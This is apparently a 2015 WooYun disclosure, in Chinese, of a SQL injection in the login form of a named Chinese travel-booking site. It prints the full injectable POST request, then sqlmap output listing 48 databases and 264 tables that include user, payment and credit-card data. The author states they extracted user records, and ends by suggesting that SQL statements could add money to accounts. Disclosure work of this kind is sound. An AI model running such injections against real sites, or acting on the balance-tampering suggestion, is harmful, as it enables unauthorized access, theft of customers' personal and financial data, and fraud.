乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-05: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-09-19: 厂商已经主动忽略漏洞,细节向公众公开
这个域名有点刚!
在扫了携程某个C段发现了这个网站,登陆处存在POST注入,抓包跑了下,50个库,当前库涉及几十万用户信息,更可以伪造金额体现。
POST /Account/Login?ReturnUrl=%2FHotelnew%2FOrder%3FcheckInDate%3D2015-08-05%26checkOutDate%3D2015-08-06%26hotelID%3DE00101025%26roomtypeId%3D1026%26rpId%3D1012861%26ppid%3D134128186 HTTP/1.1Host: www.feijipiao.cnContent-Length: 25Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.feijipiao.cnUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://www.feijipiao.cn/Account/Login?ReturnUrl=%2fHotelnew%2fOrder%3fcheckInDate%3d2015-08-05%26checkOutDate%3d2015-08-06%26hotelID%3dE00101025%26roomtypeId%3d1026%26rpId%3d1012861%26ppid%3d134128186&checkInDate=2015-08-05&checkOutDate=2015-08-06&hotelID=E00101025&roomtypeId=1026&rpId=1012861&ppid=134128186Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: pgv_pvi=9340930048; pgv_si=s543827968; bdshare_firstime=1438672541258; travelCity=cityid=0101&cityname=%e5%8c%97%e4%ba%ac; QN163=0; 4000747888mid=987_24; 4000747888msg=%u60A8%u597D%uFF0C%u8BF7%u95EE%u6709%u4EC0%u4E48%u53EF%u4EE5%u5E2E%u5230%u60A8%uFF1F%u8BF7%u63A5%u53D7%u804A%u5929%u9080%u8BF7%u3002; 4000747888mh=1438672681002; 4000747888slid=slid_983_27%7C; 4000747888slid_983_27=1438672681019; his_hotel=[{"hotelName":"????o????é?????é??é???o?","hotelId":"E00101025","price":410}]; CNZZDATA1000181042=617491300-1438667942-%7C1438667942ClientName=aaa%27&PWD=aaa
数据包
[15:36:51] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2012[15:36:51] [INFO] fetching database names[15:36:51] [WARNING] reflective value(s) found and filtering out[15:36:51] [INFO] the SQL query used returns 48 entriesavailable databases [48]:[*] CANFeiYouShangWu[*] CANJinTian[*] CANJTDZB[*] CANMoLing[*] CANSengLan[*] CANTianTai[*] CANTianYiLou[*] CANTianYun[*] CANXingTu[*] CANXinZhuLiu[*] CANYuLiang[*] CANYunShangFei[*] CSXChunShi[*] CSXCuoFengCY[*] CSXFuHang[*] CSXJinFei[*] CSXKaiWei[*] CSXLeFei[*] CSXLongXing[*] CSXTianYuSW[*] CSXTongYun[*] CSXWoYaoFei[*] CSXXingShaPiaoWu[*] CSXXinJiYuan[*] CSXYiTong[*] CSXYuLiang[*] CSXZeTuo[*] DataService[*] FJPDB[*] HGHWanTu[*] HGHZhuJiFeiKuai[*] master[*] model[*] msdb[*] NNGXinRui[*] OADB[*] PEK360ShangLv[*] PEKBaiWei[*] PEKFeiYingZhanChi[*] PEKJieLan[*] PEKJinLongShenShi[*] PEKJunPeng[*] PEKWanYou[*] PEKYiChuXing[*] PEKYiFeiChangXing[*] SHAShunxingTianXia[*] TAOPengFei[*] tempdb[15:36:52] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 2 times[15:36:52] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\output\www.feijipiao.cn'
50个库,,我已经看傻了。
Database: FJPDB[264 tables]+----------------------------------+| APIManager || APIManagerLog || APIOperLog || Account || ActivityLottery || Agent || AirCo || AirPort || BAArea || BAChng || BADistance || BAPlaneInfo || BAPrice || BAPriceBak || BAPriceNO || BCInfo_Temp || BCScheduling_Temp || BCSwingCardTemp_Temp || BDBank || BDBankCreditCard || BDBankOffLine || BDDic || BDPayPlatParam || BOLog || BOPage || BORole || BOUser || BankStatement || CabinGW || Client || ClientB2B || ClientB2BAccount || ClientB2BAirCoAcct || ClientB2BBill || ClientB2BContact || ClientB2BLog || ClientB2BTranRec || ClientB2BUser || ClientB2BZChng || ClientCashLog || ClientCashTake || ClientFeedback || ClientJiFenLog || ClientLevel || ClientLoginLog || ClientPsgr || ClientRefund || CommonDiscount || CommonPassenger || Contract || Coupon || CouponType || Customer || FinMatch || FinMatchSwitch || FinSell || FinTradeDetail || FlightQuery || FlightQueryAndT || FlightQueryF || FlightQueryT || FlightTaxAirFree || FlightTemp || FriendLink || GiftSerial || GiftSerialChk || Help || HotelAddPriceDetail || HotelBrand || HotelCancelRule || HotelChangePrice || HotelCommissionRule || HotelCommissionRuleDetail || HotelDetail || HotelDetailNew || HotelGarantee || HotelImage || HotelImageNew || HotelInfo || HotelInfoNew || HotelInfoReplenish || HotelJLCity || HotelJLState || HotelLocation || HotelLocationNewID || HotelLog || HotelMail || HotelNear || HotelNearNew || HotelOnlinePayment || HotelOrder || HotelOrderCreditCard || HotelOrderGuest || HotelOrderProcessLog || HotelOrderRate || HotelPrePayBase || HotelPromotion || HotelQunar || HotelQunarCityInfo || HotelQunarOrder || HotelQunarRoom || HotelRateTypeInfo || HotelRelation || HotelRoom || HotelRoomNew || HotelRoomPriceDetail || HotelRoomPriceDetailH || HotelRoomPriceQueue || HotelRoomRate || HotelRoomRateNew || HotelSearchProcess || HotelSelfId || HotelUserComment || HotelUserCommentSummary || InsureWaitIssue || JPAirCoRebateRateSet || JPInsureProfit || MarketingLog || MarketingUser || MarketingUserDetail || News || NewsComment || NewsType || Notepad || Notes || NotesType || NotesViewer || OTA || OrderAir || OrderAirBuyerTTSTask || OrderAirCoTktInfoPN || OrderAirComment || OrderAirF || OrderAirF_V || OrderAirGJQL || OrderAirH || OrderAirIDX || OrderAirLog || OrderAirOld || OrderAirOutTktTaskDFT || OrderAirPriceChng || OrderAirT || OrderAirTAPPClient || OrderAirTBTktCallBack || OrderAirTChange || OrderAirTChng || OrderAirTRefund || OrderAirTRefundRule || OrderAirTTSNotify || OrderAirTWrong || OrderAirTimeLimit || OrderAirV || OrderList517 || OrderLowerCabin || OrderSameCabin || OrderTicketUseStatTask || Organization || PIDInfo || PIDInstructionHis || PIDUserHis || PassengerInfo || PayDetach || PayTask || PayTicketNoBack || PkgAssociate || PkgAttractions || PkgOrder || PkgPicture || PkgProductInfo || PkgScenicInfo || Policy || PolicyActivityGW || PolicyActivityGWLog || PolicyCheckPoint || PolicyCheckPointLog || PolicyDSV || PolicyLog || PolicyOperLog || Problem || ProblemReply || ProfitAdj || QTInfo || QTInfo_Bak || QtInfoHis || RTXNotify || ReceiptCost || ReceiptCostDetail || ReportTrend || ReportTrendData || SMSReceive || SMSSendWait || SMSSended || SMSTask || SMSTemplet || SMSTempletF || SYSIPAttack || SYSLog || SYSParam || SmsTaskResult || SmsTaskWait || SolarData || SpecialDiscount || SystemLog || TaoBaoAirLine || TaoBaoAirLog || TaoBaoAirPrice || TicketOrder || TicketPlatform || TicketProduct || TicketProductPrice_AI || TicketProduct_AI || TicketProduct_BL || TicketProduct_JU || TicketProduct_QN || TicketQunarOrder || TicketQunarOrderPay || TicketQunarOrderPerson || TicketRefund || TicketResource_BL || TktAirRec || TktAirRecPNRInfo || TrainAccount || TrainOrder || TrainOrderH || TrainOrderLog || TrainOrderPsgr || TrainOrderV || TrainSourceManage || TrainVerify || TrainVerifyH || TrainVerifyPsgr || TrainVerifyPsgrH || TrainVersionInfo || TravelAD || TravelActivityDate || TravelApiProcess || TravelBranch || TravelDates || TravelHotLocation || TravelHotelInfo || TravelLineLog || TravelNavigationBar || TravelNearCity || TravelOrderCreditCard || TravelOrderLog || TravelPromotion || TravelSearchKeyWord || TravelSeasonPopular || TravelTrafficInfo || TravelTui || TsqlLog || UserCollection || UserReviews || _FinTradeDetail20150313 || _HotelInfonewUpd0603 || _HuoChePiaoIDNo || _OrderAirT201501091140afterdate8 || _OrderAirTChng201501081625 || _OrderAirTChng20150121 || airport1 || pidtemp || trace_profiler || v_BCInfo || v_BCUserSet |+----------------------------------+[15:36:12] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 267 times[15:36:12] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\output\www.feijipiao.cn'[*] shutting down at 15:36:12
当前库的内容,,,BOUser 存放USER数据
随便跑了点用户。。。证明下
这里可以sql语句添加下,增加金额数据。或者去翻一个有金额的用户,然后....
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)